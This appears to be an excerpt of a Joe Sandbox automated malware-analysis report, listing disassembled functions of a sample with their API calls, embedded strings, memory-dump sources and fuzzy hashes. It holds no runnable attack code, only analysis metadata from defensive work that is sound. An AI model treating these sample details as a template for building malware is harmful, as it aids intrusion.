                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: ea0278763f6ec2707a6b45ec8f25c2a4343dcd538d64d3c4d6f0f337fe0fa9df
                                • Instruction ID: 528c10d76618b775ecabde3c84b083704843bc1e847fa26107dc661d3d92c56b
                                • Opcode Fuzzy Hash: ea0278763f6ec2707a6b45ec8f25c2a4343dcd538d64d3c4d6f0f337fe0fa9df
                                • Instruction Fuzzy Hash: 05115176A40615AFD710DF98DC49FBBBBBCF748B11F00426AFA09E3680DB7559048BA1
                                Function 003B90DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                • Opcode ID: ab5a1cbaf4a76aaaa74fed684e8d32b3d6cf3e7732c77090748a87b9d9e91a92
                                • Instruction ID: a00260bf1f03b124f2494073a57c057a42615fd2bcc50eeeafcc72d5f4a289d0
                                • Opcode Fuzzy Hash: ab5a1cbaf4a76aaaa74fed684e8d32b3d6cf3e7732c77090748a87b9d9e91a92
                                • Instruction Fuzzy Hash: 6A410B7050475CAEDB338B24CD85FFB7BFC9B45308F1448E9EB868A582D2719A459F20
                                Function 00398980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00398996
                                  • Part of subcall function 003BA1C0: std::exception::exception.LIBCMT ref: 003BA1D5
                                  • Part of subcall function 003BA1C0: std::exception::exception.LIBCMT ref: 003BA1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 003989CD
                                  • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA188
                                  • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: invalid string position$string too long
                                • API String ID: 2002836212-4289949731
                                • Opcode ID: 162d0fac3ce06b546fe187b8ece78eba45843aac84ee8613b4dafab4fcd713ac
                                • Instruction ID: 652ae8bb307b514e51775ff6737a05bd93ba009e20aa596758c463df1496447f
                                • Opcode Fuzzy Hash: 162d0fac3ce06b546fe187b8ece78eba45843aac84ee8613b4dafab4fcd713ac
                                • Instruction Fuzzy Hash: A421A6723006505BCF229B5CE840A6AF799DBE2761B15093FF152CB641DB71DC41C3A5
                                Function 00398850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00398883
                                  • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA188
                                  • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: 869d2ea1fb38106737a7cfb65bb797e2068591e2a58b57236d6bccb7f608ea29
                                • Instruction ID: acf9543cb6b77b2da0464b064a02adf5d3e1efbba48625676f6e4ab8ae157c53
                                • Opcode Fuzzy Hash: 869d2ea1fb38106737a7cfb65bb797e2068591e2a58b57236d6bccb7f608ea29
                                • Instruction Fuzzy Hash: 013186B5E005159BCB09DF58C8916AEBBB6EBC9350F148269E915DF344DB30AD01CB91
                                Function 003B5910 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 003B5922
                                  • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA188
                                  • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA1AE
                                • std::_Xinvalid_argument.LIBCPMT ref: 003B5935
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_std::exception::exception
                                • String ID: Sec-WebSocket-Version: 13$string too long
                                • API String ID: 1928653953-3304177573
                                • Opcode ID: bac0b66e5d2b83ca75998f9c78d1376c281885c3f440784c9a67147c720f616d
                                • Instruction ID: de5b9a4e67ba1fd253120108cb07cda56cf3944150be46834906f7d380505236
                                • Opcode Fuzzy Hash: bac0b66e5d2b83ca75998f9c78d1376c281885c3f440784c9a67147c720f616d
                                • Instruction Fuzzy Hash: 70117030318B40CBD7338F2CE800B99B7E1ABD1765F250A5DE1D1CBA95CB61D841C7A1
                                Function 003B3CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,003BA430,000000FF), ref: 003B3D20
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003B3D27
                                • wsprintfA.USER32 ref: 003B3D37
                                  • Part of subcall function 003B71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003B71FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: 4652168e4eb7faf669bfb9dcd6e344cab44ee44dc25c123a034d5de3de09b199
                                • Instruction ID: 55c8b65989e9512484d62ff8a4b292d72506d2bd8c27739f1b8ec383a3d3ceb8
                                • Opcode Fuzzy Hash: 4652168e4eb7faf669bfb9dcd6e344cab44ee44dc25c123a034d5de3de09b199
                                • Instruction Fuzzy Hash: EC01C071640B14BFE7105B54DC0EFAABB6CFB55B61F000115FA05E76D0DBB42904CAA6
                                Function 003B926D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 003B9279
                                  • Part of subcall function 003B87FF: __amsg_exit.LIBCMT ref: 003B880F
                                • __amsg_exit.LIBCMT ref: 003B9299
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit$__getptd
                                • String ID: Xu<$Xu<
                                • API String ID: 441000147-2192574222
                                • Opcode ID: 6cb57df9cac18c84934e02a09611583a4a0f16e2af94e89867c88c65d65504cb
                                • Instruction ID: 18c12f1562963308ae14715115b55bb66aecdeb6d554f652684220404223dc08
                                • Opcode Fuzzy Hash: 6cb57df9cac18c84934e02a09611583a4a0f16e2af94e89867c88c65d65504cb
                                • Instruction Fuzzy Hash: EA01D632D05715A7D713AB698806BDDB354BF41718F16041AEB04AFD90CB307D40CBD5
                                Function 00398710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00398737
                                  • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA188
                                  • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: 00c821110cb1b73ab6cf23c1143ecb207e132dd84e7e7069a369bcdcb83a8686
                                • Instruction ID: 147508ae3cf101fd7e86a4273ce5e46083873b1a1fc580d55aab9220d8d707fe
                                • Opcode Fuzzy Hash: 00c821110cb1b73ab6cf23c1143ecb207e132dd84e7e7069a369bcdcb83a8686
                                • Instruction Fuzzy Hash: C7F02437F000210F8706657D8C8049EA80756E239033AC725E80AEF359DC30EC8281D5
                                Function 003B86D2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 003B781C: __mtinitlocknum.LIBCMT ref: 003B7832
                                  • Part of subcall function 003B781C: __amsg_exit.LIBCMT ref: 003B783E
                                • ___addlocaleref.LIBCMT ref: 003B8756
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                                • String ID: KERNEL32.DLL$Xu<$xt<
                                • API String ID: 3105635775-4126764381
                                • Opcode ID: 27de4e7ad4e49db9d86084b371b703d20e748da7ff5ba1d908287285bf108931
                                • Instruction ID: 82723a43b81e5cc7c7c037164810fdbdb328244079d6718071bb4aac3351a40b
                                • Opcode Fuzzy Hash: 27de4e7ad4e49db9d86084b371b703d20e748da7ff5ba1d908287285bf108931
                                • Instruction Fuzzy Hash: 51018875545700DAD722AF75C806789F7E0AF51318F20990DE6D59BAE1CFB4A944CB10
                                Function 003AE500 Relevance: 6.2, APIs: 4, Instructions: 150stringCOMMON
                                Download Yara Rule
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003AE544
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AE573
                                • lstrcat.KERNEL32(?,00000000), ref: 003AE581
                                • lstrcat.KERNEL32(?,00F7E798), ref: 003AE59C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: 4bc623de3cc40a7c7f6245247708e0e267c6216e52c0a5cb0bb91286c963b72e
                                • Instruction ID: b6afa45ea108bb0932386ebe0ade823aadbb64ec622d2b997562a3695133e86e
                                • Opcode Fuzzy Hash: 4bc623de3cc40a7c7f6245247708e0e267c6216e52c0a5cb0bb91286c963b72e
                                • Instruction Fuzzy Hash: FD51B576A10518AFCB56EB64DC42EFE337DEB58300F044498FA069B241EE70AE458BA0
                                Function 003B1FD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 003B1FDF, 003B1FF5, 003B20B7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
